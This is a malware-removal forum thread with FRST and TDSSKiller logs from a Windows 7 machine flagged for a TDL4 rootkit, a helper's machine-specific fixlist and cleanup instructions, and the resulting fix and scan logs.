2014-10-27 15:29 - 2014-06-12 08:16 - 00002154 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-10-24 18:28 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\rescache
2014-10-23 11:19 - 2013-09-24 08:33 - 00003894 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-23 11:19 - 2013-09-24 08:33 - 00003642 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-22 11:06 - 2011-11-02 07:01 - 00000000 ____D () C:\windows\SysWOW64\Macromed
2014-10-21 08:53 - 2012-05-02 18:59 - 01397728 _____ (Tweaking.com) C:\Users\My Computer\Desktop\TweakingRegistryBackup.exe
2014-10-18 11:03 - 2014-05-05 20:02 - 00000000 ___SD () C:\windows\system32\CompatTel
2014-10-18 10:41 - 2012-02-20 16:40 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-18 10:34 - 2013-07-12 07:00 - 00000000 ____D () C:\windows\system32\MRT
2014-10-18 04:18 - 2012-03-04 22:01 - 103265616 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
2014-10-17 18:14 - 2012-07-17 14:34 - 00003984 _____ () C:\windows\System32\Tasks\PC Checkup 3 Weekly Scan
2014-10-12 07:47 - 2011-11-02 07:01 - 00000000 ____D () C:\ProgramData\Adobe

Some content of TEMP:
====================
C:\Users\My Computer\AppData\Local\Temp\Quarantine.exe
C:\Users\My Computer\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

TDL4: custom:26000022 <===== ATTENTION!


LastRegBack: 2014-10-27 07:21

==================== End Of Log ============================

Hi wingeater,

http://i1269.photobucket.com/albums/jj590/OCD-WTT/bullseye_zpse9eaf36e.gif (http://s1269.photobucket.com/user/OCD-WTT/media/bullseye_zpse9eaf36e.gif.html) FRST Fix Script

Open notepad. Please copy the contents of the code box below. To do this highlight the contents of the box and right click on it. Paste this into the open notepad. Save it on the desktop as fixlist.txt



Start
CloseProcesses:
HKLM\...\Run: [] => [X]
Toolbar: HKLM-x32 - No Name - {8660E5B3-6C41-44DE-8503-98D99BBECD41} - No File
CHR StartupUrls: Default -> "hxxp://mysearch.avg.com?cid={C5A5FB70-D1E9-4A53-A320-CCB386C446A5}&mid=02c46f78a88847d0bb19e929310f541b-671ef39aac1444e99a49d5d3d7f7fe13e79e8395&lang=en&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-06-13 12:39:30&v=18.1.0.443&pid=safeguard&sg=&sap=hp"
TDL4: custom:26000022 <===== ATTENTION!
EmptyTemp:
End


NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Now please enter System Recovery Options.
Run FRST and press the Fix button just once and wait.
The tool will make a log (Fixlog.txt) please post it to your reply.
Reboot into Normal Mode

=========================

http://i1269.photobucket.com/albums/jj590/OCD-WTT/bullseye_zpse9eaf36e.gif (http://s1269.photobucket.com/user/OCD-WTT/media/bullseye_zpse9eaf36e.gif.html) TDSSKiller

Please download TDSSKiller.zip (http://support.kaspersky.com/downloads/utils/tdsskiller.zip) - Extract it to your desktop

TDSSKiller.exe

Windows XP : Double click on the icon to run it.
Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"

Press Start Scan

Only if Malicious objects are found then ensure Cure is selected
Then click Continue > Reboot now

Copy and paste the log in your next reply

A copy of the log will be saved automatically to the root of the drive (typically C:\)

=========================

In your next post please provide the following:

Fixlog.txt
TDSSKiller log
How is the computer running at the moment?

Computer seems to be running much better. I haven't noticed the multiple dllhost.exe processes in the task manager.



Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 10-11-2014
Ran by My Computer at 2014-11-10 20:46:52 Run:1
Running from C:\Users\My Computer\Desktop
Loaded Profile: My Computer (Available profiles: My Computer)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
Start
CloseProcesses:
HKLM\...\Run: [] => [X]
Toolbar: HKLM-x32 - No Name - {8660E5B3-6C41-44DE-8503-98D99BBECD41} - No File
CHR StartupUrls: Default -> "hxxp://mysearch.avg.com?cid={C5A5FB70-D1E9-4A53-A320-CCB386C446A5}&mid=02c46f78a88847d0bb19e929310f541b-671ef39aac1444e99a49d5d3d7f7fe13e79e8395&lang=en&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-06-13 12:39:30&v=18.1.0.443&pid=safeguard&sg=&sap=hp"
TDL4: custom:26000022 <===== ATTENTION!
EmptyTemp:
End
*****************

Processes closed successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{8660E5B3-6C41-44DE-8503-98D99BBECD41} => value deleted successfully.
"HKCR\Wow6432Node\CLSID\{8660E5B3-6C41-44DE-8503-98D99BBECD41}" => Key not found.
Chrome StartupUrls deleted successfully.

The operation completed successfully.
The operation completed successfully.
EmptyTemp: => Removed 809.7 MB temporary data.


The system needed a reboot.

==== End of Fixlog ====




23:15:28.0903 0x1178 TDSS rootkit removing tool 3.0.0.41 Oct 28 2014 17:58:34
23:15:34.0082 0x1178 ============================================================
23:15:34.0082 0x1178 Current date / time: 2014/11/10 23:15:34.0082
23:15:34.0082 0x1178 SystemInfo:
23:15:34.0082 0x1178
23:15:34.0082 0x1178 OS Version: 6.1.7601 ServicePack: 1.0
23:15:34.0082 0x1178 Product type: Workstation
23:15:34.0082 0x1178 ComputerName: MYCOMPUTER-PC
23:15:34.0082 0x1178 UserName: My Computer
23:15:34.0082 0x1178 Windows directory: C:\windows
23:15:34.0082 0x1178 System windows directory: C:\windows
23:15:34.0082 0x1178 Running under WOW64
23:15:34.0082 0x1178 Processor architecture: Intel x64
23:15:34.0082 0x1178 Number of processors: 4
23:15:34.0082 0x1178 Page size: 0x1000
23:15:34.0082 0x1178 Boot type: Normal boot
23:15:34.0082 0x1178 ============================================================
23:15:39.0105 0x1178 KLMD registered as C:\windows\system32\drivers\78013652.sys
23:15:39.0651 0x1178 System UUID: {278B97F5-3037-3471-6035-DF25E48CD164}
23:15:40.0915 0x1178 Drive \Device\Harddisk0\DR0 - Size: 0x950B056000 ( 596.17 Gb ), SectorSize: 0x200, Cylinders: 0x13001, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
23:15:40.0977 0x1178 ============================================================
23:15:40.0977 0x1178 \Device\Harddisk0\DR0:
23:15:40.0993 0x1178 MBR partitions:
23:15:40.0993 0x1178 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x2EE800, BlocksNum 0x487EC000
23:15:40.0993 0x1178 ============================================================
23:15:41.0024 0x1178 C: <-> \Device\Harddisk0\DR0\Partition1
23:15:41.0055 0x1178 ============================================================
23:15:41.0055 0x1178 Initialize success
23:15:41.0055 0x1178 ============================================================
23:16:07.0205 0x0e30 ============================================================
23:16:07.0205 0x0e30 Scan started
23:16:07.0205 0x0e30 Mode: Manual;
23:16:07.0205 0x0e30 ============================================================
23:16:07.0205 0x0e30 KSN ping started
23:16:09.0920 0x0e30 KSN ping finished: true
23:16:11.0885 0x0e30 ================ Scan system memory ========================
23:16:11.0885 0x0e30 System memory - ok
23:16:11.0885 0x0e30 ================ Scan services =============================
23:16:12.0338 0x0e30 [ A87D604AEA360176311474C87A63BB88, B1507868C382CD5D2DBC0D62114FCFBF7A780904A2E3CA7C7C1DD0844ADA9A8F ] 1394ohci C:\windows\system32\drivers\1394ohci.sys
23:16:12.0353 0x0e30 1394ohci - ok
23:16:12.0400 0x0e30 [ D81D9E70B8A6DD14D42D7B4EFA65D5F2, FDAAB7E23012B4D31537C5BDEF245BB0A12FA060A072C250E21C68E18B22E002 ] ACPI C:\windows\system32\drivers\ACPI.sys
23:16:12.0416 0x0e30 ACPI - ok
23:16:12.0462 0x0e30 [ 99F8E788246D495CE3794D7E7821D2CA, F91615463270AD2601F882CAED43B88E7EDA115B9FD03FC56320E48119F15F76 ] AcpiPmi C:\windows\system32\drivers\acpipmi.sys
23:16:12.0462 0x0e30 AcpiPmi - ok
23:16:12.0634 0x0e30 [ C5679E5186B2FC95BC76A8A9870D5456, 70AC61850B811A0A902532F098AE1D5DF4622455E56C78B89D4ABDBE4A061A48 ] AdobeARMservice C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
23:16:12.0634 0x0e30 AdobeARMservice - ok
23:16:12.0930 0x0e30 [ 4ECFCAAE5CB380F58934F0DCF5F64E7F, D82B37E57D93484D7A3CB65470BCD54A578A695F0203A8DD441B1348C1EEA751 ] AdobeFlashPlayerUpdateSvc C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
23:16:12.0946 0x0e30 AdobeFlashPlayerUpdateSvc - ok
23:16:13.0040 0x0e30 [ 2F6B34B83843F0C5118B63AC634F5BF4, 43E3F5FBFB5D33981AC503DEE476868EC029815D459E7C36C4ABC2D2F75B5735 ] adp94xx C:\windows\system32\drivers\adp94xx.sys
23:16:13.0055 0x0e30 adp94xx - ok
23:16:13.0133 0x0e30 [ 597F78224EE9224EA1A13D6350CED962, DA7FD99BE5E3B7B98605BF5C13BF3F1A286C0DE1240617570B46FE4605E59BDC ] adpahci C:\windows\system32\drivers\adpahci.sys
23:16:13.0149 0x0e30 adpahci - ok
23:16:13.0227 0x0e30 [ E109549C90F62FB570B9540C4B148E54, E804563735153EA00A00641814244BC8A347B578E7D63A16F43FB17566EE5559 ] adpu320 C:\windows\system32\drivers\adpu320.sys
23:16:13.0227 0x0e30 adpu320 - ok
23:16:13.0289 0x0e30 [ 4B78B431F225FD8624C5655CB1DE7B61, 198A5AF2125C7C41F531A652D200C083A55A97DC541E3C0B5B253C7329949156 ] AeLookupSvc C:\windows\System32\aelupsvc.dll
23:16:13.0289 0x0e30 AeLookupSvc - ok
23:16:13.0398 0x0e30 [ FA886682CFC5D36718D3E436AACF10B9, F80AB4F91AA6B5C7ECCB000D8E1BC2CF776DC3D69B3D9EBC2558C19035A6B3AB ] AFD C:\windows\system32\drivers\afd.sys
23:16:13.0414 0x0e30 AFD - ok
23:16:13.0461 0x0e30 [ 608C14DBA7299D8CB6ED035A68A15799, 45360F89640BF1127C82A32393BD76205E4FA067889C40C491602F370C09282A ] agp440 C:\windows\system32\drivers\agp440.sys
23:16:13.0461 0x0e30 agp440 - ok
23:16:13.0586 0x0e30 [ 3290D6946B5E30E70414990574883DDB, 0E9294E1991572256B3CDA6B031DB9F39CA601385515EE59F1F601725B889663 ] ALG C:\windows\System32\alg.exe
23:16:13.0586 0x0e30 ALG - ok
23:16:13.0632 0x0e30 [ 5812713A477A3AD7363C7438CA2EE038, A7316299470D2E57A11499C752A711BF4A71EB11C9CBA731ED0945FF6A966721 ] aliide C:\windows\system32\drivers\aliide.sys
23:16:13.0648 0x0e30 aliide - ok
23:16:13.0679 0x0e30 [ C08ADE825268D291AFE06EDA71415C7D, 0AB351119D6ACAAED51F8091294AE6CE4A6EC980B14796D8FA0F14F399A1FF1C ] AMD External Events Utility C:\windows\system32\atiesrxx.exe
23:16:13.0679 0x0e30 AMD External Events Utility - ok
23:16:13.0710 0x0e30 [ 1FF8B4431C353CE385C875F194924C0C, 3EA3A7F426B0FFC2461EDF4FDB4B58ACC9D0730EDA5B728D1EA1346EA0A02720 ] amdide C:\windows\system32\drivers\amdide.sys
23:16:13.0710 0x0e30 amdide - ok
23:16:13.0757 0x0e30 [ 7024F087CFF1833A806193EF9D22CDA9, E7F27E488C38338388103D3B7EEDD61D05E14FB140992AEE6F492FFC821BF529 ] AmdK8 C:\windows\system32\drivers\amdk8.sys
23:16:13.0757 0x0e30 AmdK8 - ok
23:16:14.0568 0x0e30 [ F59A32A90C4F96189CD74473F7BE572B, 278D81DBFA1E31ED3AB7A0A3F675E4236D356FD78AD4C149BCD9415F4F5F08A3 ] amdkmdag C:\windows\system32\DRIVERS\atikmdag.sys
23:16:15.0052 0x0e30 amdkmdag - ok
23:16:15.0114 0x0e30 [ 0327723D45A7BB7C1FE4835EB784AC61, B1A9C51C911045F11582CEDC2A5D3A51AB5AD08C341FE1BCEE021E179EA2C81B ] amdkmdap C:\windows\system32\DRIVERS\atikmpag.sys
23:16:15.0130 0x0e30 amdkmdap - ok
23:16:15.0192 0x0e30 [ 1E56388B3FE0D031C44144EB8C4D6217, E88CA76FD47BA0EB427D59CB9BE040DE133D89D4E62D03A8D622624531D27487 ] AmdPPM C:\windows\system32\DRIVERS\amdppm.sys
23:16:15.0192 0x0e30 AmdPPM - ok
23:16:15.0224 0x0e30 [ D4121AE6D0C0E7E13AA221AA57EF2D49, 626F43C099BD197BE56648C367B711143C2BCCE96496BBDEF19F391D52FA01D0 ] amdsata C:\windows\system32\drivers\amdsata.sys
23:16:15.0224 0x0e30 amdsata - ok
23:16:15.0255 0x0e30 [ F67F933E79241ED32FF46A4F29B5120B, D6EF539058F159CC4DD14CA9B1FD924998FEAC9D325C823C7A2DD21FEF1DC1A8 ] amdsbs C:\windows\system32\drivers\amdsbs.sys
23:16:15.0255 0x0e30 amdsbs - ok
23:16:15.0286 0x0e30 [ 540DAF1CEA6094886D72126FD7C33048, 296578572A93F5B74E1AD443E000B79DC99D1CBD25082E02704800F886A3065F ] amdxata C:\windows\system32\drivers\amdxata.sys
23:16:15.0286 0x0e30 amdxata - ok
23:16:15.0676 0x0e30 [ B1F3E64C26684D60DE67BED3E6718783, ED78606EA6A677C7AE9001B95598C02344BB91B4448D11797354AD3512AFA05F ] appdrv01 C:\windows\system32\Drivers\appdrv01.sys
23:16:15.0848 0x0e30 appdrv01 - ok
23:16:15.0863 0x0e30 appdrvrem01 - ok
23:16:15.0894 0x0e30 [ 89A69C3F2F319B43379399547526D952, 8ABDB4B8E106F96EBBA0D4D04C4F432296516E107E7BA5644ED2E50CF9BB491A ] AppID C:\windows\system32\drivers\appid.sys
23:16:15.0910 0x0e30 AppID - ok
23:16:15.0926 0x0e30 [ 0BC381A15355A3982216F7172F545DE1, C33AF13CB218F7BF52E967452573DF2ADD20A95C6BF99229794FEF07C4BBE725 ] AppIDSvc C:\windows\System32\appidsvc.dll
23:16:15.0926 0x0e30 AppIDSvc - ok
23:16:15.0957 0x0e30 [ 9D2A2369AB4B08A4905FE72DB104498F, D6FA1705018BABABFA2362E05691A0D6408D14DE7B76129B16D0A1DAD6378E58 ] Appinfo C:\windows\System32\appinfo.dll
23:16:15.0957 0x0e30 Appinfo - ok
23:16:15.0988 0x0e30 [ C484F8CEB1717C540242531DB7845C4E, C507CE26716EB923B864ED85E8FA0B24591E2784A2F4F0E78AEED7E9953311F6 ] arc C:\windows\system32\drivers\arc.sys
23:16:15.0988 0x0e30 arc - ok
23:16:16.0019 0x0e30 [ 019AF6924AEFE7839F61C830227FE79C, 5926B9DDFC9198043CDD6EA0B384C83B001EC225A8125628C4A45A3E6C42C72A ] arcsas C:\windows\system32\drivers\arcsas.sys
23:16:16.0035 0x0e30 arcsas - ok
23:16:16.0160 0x0e30 [ 9A262EDD17F8473B91B333D6B031A901, 05DFBD3A7D83FDE1D062EA719ACA9EC48CB7FD42D17DDD88B82E5D25469ADD23 ] aspnet_state C:\windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
23:16:16.0191 0x0e30 aspnet_state - ok
23:16:16.0253 0x0e30 [ D95E64416A4A3ED6986E0F474DA934BD, DBB4A0DED0DABE1F8FF0DB8C0E9EC4EC906A85A45DC0AEC013A8744F9BF5D40E ] aswHwid C:\windows\system32\drivers\aswHwid.sys
23:16:16.0269 0x0e30 aswHwid - ok
23:16:16.0316 0x0e30 [ FF1E537A3632CBB9A0BF72B9FD0878D5, B26E6A1F6E6FA5280A12861EFAD44D8F49353F47B21843EBA73E149CF613DCBC ] aswMonFlt C:\windows\system32\drivers\aswMonFlt.sys
23:16:16.0316 0x0e30 aswMonFlt - ok
23:16:16.0347 0x0e30 [ A5757DE5F9C83AB40667A53D5126EA40, 58B72B1B126CF641188703CE82E26BEB0C41AD7587CFFCCCE9E3C64CC7AACC90 ] aswRdr C:\windows\system32\drivers\aswRdr2.sys
23:16:16.0362 0x0e30 aswRdr - ok
23:16:16.0394 0x0e30 [ 645D97385F3F284FB5604F9B970F4D24, 15A9D7F0F4C1062210E4E744A9069B8645177D19F35B8740D74022639DC05F2E ] aswRvrt C:\windows\system32\drivers\aswRvrt.sys
23:16:16.0394 0x0e30 aswRvrt - ok
23:16:16.0487 0x0e30 [ B8FDEDE963B82CFD23B3A53A3084666D, 3537E5B684FB6F0AA589A5FA7CD111E1744DF384AB1A266D4114100F104ED11B ] aswSnx C:\windows\system32\drivers\aswSnx.sys
23:16:16.0518 0x0e30 aswSnx - ok
23:16:16.0596 0x0e30 [ 0DEDC041DF594AEC2C3BD00417CFAF60, 0D3A8924503986546EE256D185225C0B080FDB6B0C8B0BED7516B07A7334371B ] aswSP C:\windows\system32\drivers\aswSP.sys
23:16:16.0612 0x0e30 aswSP - ok
23:16:16.0674 0x0e30 [ 48DED912CDE54FC0923B9858512366E1, 9B216B934408A7CB3CE2B41240B7EF01EAA3BC066211B784064FF8AC97A29B4E ] aswStm C:\windows\system32\drivers\aswStm.sys
23:16:16.0674 0x0e30 aswStm - ok
23:16:16.0737 0x0e30 [ 471A311745848B80339436688A8286E6, E51C57236CEC19AC38E85D115DB97875517D837811188AD2E53FA49055B53890 ] aswVmm C:\windows\system32\drivers\aswVmm.sys
23:16:16.0737 0x0e30 aswVmm - ok
23:16:16.0768 0x0e30 [ 769765CE2CC62867468CEA93969B2242, 0D8F19D49869DF93A3876B4C2E249D12E83F9CE11DAE8917D368E292043D4D26 ] AsyncMac C:\windows\system32\DRIVERS\asyncmac.sys
23:16:16.0768 0x0e30 AsyncMac - ok
23:16:16.0784 0x0e30 [ 02062C0B390B7729EDC9E69C680A6F3C, 0261683C6DC2706DCE491A1CDC954AC9C9E649376EC30760BB4E225E18DC5273 ] atapi C:\windows\system32\drivers\atapi.sys
23:16:16.0799 0x0e30 atapi - ok
23:16:16.0846 0x0e30 [ 4BF5BCA6E2608CD8A00BC4A6673A9F47, 172240231981162F67DD2CF13C6D8C807EFFCE9C24B476F2942BC3E1F41C1A71 ] AtiHDAudioService C:\windows\system32\drivers\AtihdW76.sys
23:16:16.0846 0x0e30 AtiHDAudioService - ok
23:16:16.0893 0x0e30 [ F23FEF6D569FCE88671949894A8BECF1, FCE7B156ED663471CF9A736915F00302E93B50FC647563D235313A37FCE8F0F6 ] AudioEndpointBuilder C:\windows\System32\Audiosrv.dll
23:16:16.0924 0x0e30 AudioEndpointBuilder - ok
23:16:16.0940 0x0e30 [ F23FEF6D569FCE88671949894A8BECF1, FCE7B156ED663471CF9A736915F00302E93B50FC647563D235313A37FCE8F0F6 ] AudioSrv C:\windows\System32\Audiosrv.dll
23:16:16.0955 0x0e30 AudioSrv - ok
23:16:17.0049 0x0e30 [ 73F5C13B431915BAE35254B4E95DFB71, 393A045859382C44133C004598B1512048046BCC129FED2247A77FDBFCDB6DFF ] avast! Antivirus C:\Program Files\AVAST Software\Avast\AvastSvc.exe
23:16:17.0064 0x0e30 avast! Antivirus - ok
23:16:17.0096 0x0e30 [ A6BF31A71B409DFA8CAC83159E1E2AFF, CBB83F73FFD3C3FB4F96605067739F8F7A4A40B2B05417FA49E575E95628753F ] AxInstSV C:\windows\System32\AxInstSV.dll
23:16:17.0096 0x0e30 AxInstSV - ok
23:16:17.0158 0x0e30 [ 3E5B191307609F7514148C6832BB0842, DE011CB7AA4A2405FAF21575182E0793A1D83DFFC44E9A7864D59F3D51D8D580 ] b06bdrv C:\windows\system32\drivers\bxvbda.sys
23:16:17.0174 0x0e30 b06bdrv - ok
23:16:17.0205 0x0e30 [ B5ACE6968304A3900EEB1EBFD9622DF2, 1DAA118D8CA3F97B34DF3D3CDA1C78EAB2ED225699FEABE89D331AE0CB7679FA ] b57nd60a C:\windows\system32\DRIVERS\b57nd60a.sys
23:16:17.0220 0x0e30 b57nd60a - ok
23:16:17.0423 0x0e30 [ F2E8CEFC8CF4D6454F4121C5FF93136A, DFD05AD328BD0FDD8BF44043C40084A6DF98BF6F5CEAE71BF793176AF6ADFBBB ] BBSvc C:\Program Files (x86)\Microsoft\BingBar\7.3.124.0\BBSvc.exe
23:16:17.0423 0x0e30 BBSvc - ok
23:16:17.0470 0x0e30 [ 6E1BCC590C9D30FEE8FC14DBD053CE94, 4F698D399225A890B7FDCE3773E504B2880534ED1C0F4C37589568C44BA51743 ] BBUpdate C:\Program Files (x86)\Microsoft\BingBar\7.3.124.0\SeaPort.exe
23:16:17.0470 0x0e30 BBUpdate - ok
23:16:17.0532 0x0e30 [ FDE360167101B4E45A96F939F388AEB0, 8D1457E866BBD645C4B9710DFBFF93405CC1193BF9AE42326F2382500B713B82 ] BDESVC C:\windows\System32\bdesvc.dll
23:16:17.0532 0x0e30 BDESVC - ok
23:16:17.0579 0x0e30 [ 16A47CE2DECC9B099349A5F840654746, 77C008AEDB07FAC66413841D65C952DDB56FE7DCA5E9EF9C8F4130336B838024 ] Beep C:\windows\system32\drivers\Beep.sys
23:16:17.0579 0x0e30 Beep - ok
23:16:17.0688 0x0e30 [ 82974D6A2FD19445CC5171FC378668A4, 075D25F47C0D2277E40AF8615571DAA5EB16B1824563632A9A7EC62505C29A4A ] BFE C:\windows\System32\bfe.dll
23:16:17.0704 0x0e30 BFE - ok
23:16:17.0813 0x0e30 [ 1EA7969E3271CBC59E1730697DC74682, D511A34D63A6E0E6E7D1879068E2CD3D87ABEAF4936B2EA8CDDAD9F79D60FA04 ] BITS C:\windows\System32\qmgr.dll
23:16:17.0829 0x0e30 BITS - ok
23:16:17.0860 0x0e30 [ 61583EE3C3A17003C4ACD0475646B4D3, 17E4BECC309C450E7E44F59A9C0BBC24D21BDC66DFBA65B8F198A00BB47A9811 ] blbdrive C:\windows\system32\DRIVERS\blbdrive.sys
23:16:17.0860 0x0e30 blbdrive - ok
23:16:17.0907 0x0e30 [ 6C02A83164F5CC0A262F4199F0871CF5, AD4632A6A203CB40970D848315D8ADB9C898349E20D8DF4107C2AE2703A2CF28 ] bowser C:\windows\system32\DRIVERS\bowser.sys
23:16:17.0907 0x0e30 bowser - ok
23:16:18.0000 0x0e30 [ F09EEE9EDC320B5E1501F749FDE686C8, 66691114C42E12F4CC6DC4078D4D2FA4029759ACDAF1B59D17383487180E84E3 ] BrFiltLo C:\windows\system32\drivers\BrFiltLo.sys
23:16:18.0000 0x0e30 BrFiltLo - ok
23:16:18.0032 0x0e30 [ B114D3098E9BDB8BEA8B053685831BE6, 0ED23C1897F35FA00B9C2848DE4ED200E18688AA7825674888054BBC3A3EB92C ] BrFiltUp C:\windows\system32\drivers\BrFiltUp.sys
23:16:18.0032 0x0e30 BrFiltUp - ok
23:16:18.0094 0x0e30 [ 05F5A0D14A2EE1D8255C2AA0E9E8E694, 40011138869F5496A3E78D38C9900B466B6F3877526AC22952DCD528173F4645 ] Browser C:\windows\System32\browser.dll
23:16:18.0094 0x0e30 Browser - ok
23:16:18.0156 0x0e30 [ 43BEA8D483BF1870F018E2D02E06A5BD, 4E6F5A5FD8C796A110B0DC9FF29E31EA78C04518FC1C840EF61BABD58AB10272 ] Brserid C:\windows\System32\Drivers\Brserid.sys
23:16:18.0172 0x0e30 Brserid - ok
23:16:18.0203 0x0e30 [ A6ECA2151B08A09CACECA35C07F05B42, E2875BB7768ABAF38C3377007AA0A3C281503474D1831E396FB6599721586B0C ] BrSerWdm C:\windows\System32\Drivers\BrSerWdm.sys
23:16:18.0219 0x0e30 BrSerWdm - ok
23:16:18.0250 0x0e30 [ B79968002C277E869CF38BD22CD61524, 50631836502237AF4893ECDCEA43B9031C3DE97433F594D46AF7C3C77F331983 ] BrUsbMdm C:\windows\System32\Drivers\BrUsbMdm.sys
23:16:18.0250 0x0e30 BrUsbMdm - ok
23:16:18.0266 0x0e30 [ A87528880231C54E75EA7A44943B38BF, 4C8BBB29FDA76A96840AA47A8613C15D4466F9273A13941C19507008629709C9 ] BrUsbSer C:\windows\System32\Drivers\BrUsbSer.sys
23:16:18.0266 0x0e30 BrUsbSer - ok
23:16:18.0297 0x0e30 [ 9DA669F11D1F894AB4EB69BF546A42E8, B498B8B6CEF957B73179D1ADAF084BBB57BB3735D810F9BE2C7B1D58A4FD25A4 ] BTHMODEM C:\windows\system32\drivers\bthmodem.sys
23:16:18.0297 0x0e30 BTHMODEM - ok
23:16:18.0344 0x0e30 [ 95F9C2976059462CBBF227F7AAB10DE9, 2797AE919FF7606B070FB039CECDB0707CD2131DCAC09C5DF14F443D881C9F34 ] bthserv C:\windows\system32\bthserv.dll
23:16:18.0344 0x0e30 bthserv - ok
23:16:18.0375 0x0e30 [ B8BD2BB284668C84865658C77574381A, 6C55BA288B626DF172FDFEA0BD7027FAEBA1F44EF20AB55160D7C7DC6E717D65 ] cdfs C:\windows\system32\DRIVERS\cdfs.sys
23:16:18.0390 0x0e30 cdfs - ok
23:16:18.0422 0x0e30 [ F036CE71586E93D94DAB220D7BDF4416, BD07AAD9E20CEAF9FC84E4977C55EA2C45604A2C682AC70B9B9A2199B6713D5B ] cdrom C:\windows\system32\DRIVERS\cdrom.sys
23:16:18.0437 0x0e30 cdrom - ok
23:16:18.0468 0x0e30 [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] CertPropSvc C:\windows\System32\certprop.dll
23:16:18.0468 0x0e30 CertPropSvc - ok
23:16:18.0500 0x0e30 [ D7CD5C4E1B71FA62050515314CFB52CF, 513B5A849899F379F0BC6AB3A8A05C3493C2393C95F036612B96EC6E252E1C64 ] circlass C:\windows\system32\drivers\circlass.sys
23:16:18.0500 0x0e30 circlass - ok
23:16:18.0531 0x0e30 [ FE1EC06F2253F691FE36217C592A0206, B9F122DB5E665ECDF29A5CB8BB6B531236F31A54A95769D6C5C1924C87FE70CE ] CLFS C:\windows\system32\CLFS.sys
23:16:18.0546 0x0e30 CLFS - ok
23:16:18.0624 0x0e30 [ F13EC8A783E0CB0D6DC26A3CA848B7B8, 0809E3B71709F1343086EEB6C820543C1A7119E74EEF8AC1AEE1F81093ABEC66 ] clr_optimization_v2.0.50727_32 C:\windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
23:16:18.0624 0x0e30 clr_optimization_v2.0.50727_32 - ok
23:16:18.0671 0x0e30 [ B4D73F04E9BC076F7CDAC4327DF636BB, 1ADED20D5A0D0A76E2F85CB778FD06BAB814868D35F8532E17D67045FF4770C2 ] clr_optimization_v2.0.50727_64 C:\windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
23:16:18.0671 0x0e30 clr_optimization_v2.0.50727_64 - ok
23:16:18.0749 0x0e30 [ E87213F37A13E2B54391E40934F071D0, 7EB221127EFB5BF158FB03D18EFDA2C55FB6CE3D1A1FE69C01D70DBED02C87E5 ] clr_optimization_v4.0.30319_32 C:\windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
23:16:19.0264 0x0e30 clr_optimization_v4.0.30319_32 - ok
23:16:19.0326 0x0e30 [ 4AEDAB50F83580D0B4D6CF78191F92AA, D113C47013B018B45161911B96E93AF96A2F3B34FA47061BF6E7A71FBA03194A ] clr_optimization_v4.0.30319_64 C:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
23:16:19.0560 0x0e30 clr_optimization_v4.0.30319_64 - ok
23:16:19.0592 0x0e30 [ 0840155D0BDDF1190F84A663C284BD33, 696039FA63CFEB33487FAA8FD7BBDB220141E9C6E529355D768DFC87999A9C3A ] CmBatt C:\windows\system32\DRIVERS\CmBatt.sys
23:16:19.0592 0x0e30 CmBatt - ok
23:16:19.0638 0x0e30 [ E19D3F095812725D88F9001985B94EDD, 46243C5CCC4981CAC6FA6452FFCEC33329BF172448F1852D52592C9342E0E18B ] cmdide C:\windows\system32\drivers\cmdide.sys
23:16:19.0638 0x0e30 cmdide - ok
23:16:19.0701 0x0e30 [ EBF28856F69CF094A902F884CF989706, AD6C9F0BC20AA49EEE5478DA0F856F0EA2B414B63208C5FFB03C9D7F5B59765F ] CNG C:\windows\system32\Drivers\cng.sys
23:16:19.0701 0x0e30 CNG - ok
23:16:19.0748 0x0e30 [ 102DE219C3F61415F964C88E9085AD14, CD74CB703381F1382C32CF892FF2F908F4C9412E1BC77234F8FEA5D4666E1BF1 ] Compbatt C:\windows\system32\drivers\compbatt.sys
23:16:19.0748 0x0e30 Compbatt - ok
23:16:19.0794 0x0e30 [ 03EDB043586CCEBA243D689BDDA370A8, 0E4523AA332E242D5C2C61C5717DBA5AB6E42DADB5A7E512505FC2B6CC224959 ] CompositeBus C:\windows\system32\DRIVERS\CompositeBus.sys
23:16:19.0794 0x0e30 CompositeBus - ok
23:16:19.0794 0x0e30 COMSysApp - ok
